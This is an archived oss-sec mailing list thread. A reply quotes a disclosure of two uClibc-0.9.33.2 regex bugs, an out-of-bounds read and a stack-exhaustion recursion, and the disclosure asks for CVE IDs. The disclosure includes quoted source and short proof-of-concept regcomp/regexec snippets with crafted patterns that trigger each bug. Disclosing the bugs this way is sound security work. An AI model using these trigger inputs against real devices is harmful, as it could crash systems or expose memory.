oss-sec mailing list archives

Re: two vulns in uClibc-0.9.33.2


From: Zach W <kestrel () trylinux us>
Date: Fri, 16 Jun 2017 01:21:53 -0400

s/large\ number/nearly\ all/g

Talking millions, not thousands.

Zach W.


On 6/15/17 11:53 PM, fefe wrote:
I found two vulns in  uClibc-0.9.33.2 (https://uclibc.org/)


one is about line 2682 of get_subexp.c :


              if (BE (bkref_str_off >= mctx->input.valid_len, 0))
              {
                /* If we are at the end of the input, we cannot match.  */
                if (bkref_str_off >= mctx->input.len)
                  break;


                err = extend_buffers (mctx);
                if (BE (err != REG1_NOERROR, 0))
                  return err;


                buf = (const char *) re_string_get_buffer (&mctx->input);
              }
            if (buf [bkref_str_off++] != buf[sl_str - 1])
              break; /* We don't need to search this sub expression
              
"bkref_str_off >= mctx->input.valid_len" , when  bkref_str_off == mctx->input.valid_len, "buf [bkref_str_off++] != 
buf[sl_str - 1]" case Out of one bit bounds read


The poc code like:
      
      if(regcomp (&regtmp,"(.+)upper\\1^", REG_EXTENDED|REG_ICASE | REG_NOSUB )==0)
      {               
              reg1match_t pmatch[1];
              regexec(&regtmp, "upperupperupperx",1, pmatch, 0);
              regfree(&regtmp);
      }






The another is aout line 1837 of regexce.c :


              check_dst_limits_calc_pos_1 (const re_match_context_t *mctx, int boundaries,
                           int subexp_idx, int from_node, int bkref_idx)
                .......


                cpos =
                  check_dst_limits_calc_pos_1 (mctx, boundaries, subexp_idx,
                                               dst, bkref_idx);


              
check_dst_limits_calc_pos_1 recursive calls case DDOS, because of stack exhaustion.


The poc code like:    
      
      if(regcomp 
(&regtmp,"\x28\x2E\x3F\x3F\x28\x2E\x3F\x29\x5C\x42\x44\x3F\x3F\x28\x2E\x5C\x32\x29\x2A\x5C\x32\x28\x2E\x3F\x29\x5C\x32\x29\x2A\x5C\x32\xBD",
 REG_EXTENDED|REG_ICASE | REG_NOSUB )==0)
      {               
              reg1match_t pmatch[1];
              regexec(&regtmp, "\x72\xFF\xFF\xFF\xFF\xBD",1, pmatch, 0);
              regfree(&regtmp);
      }




A large number of embedded devices uses uclibc instead of glibc.
Could you assign CVE id for those?


Thank you


Benjin Liu
Codesafe Team of Qihoo 360


Current thread: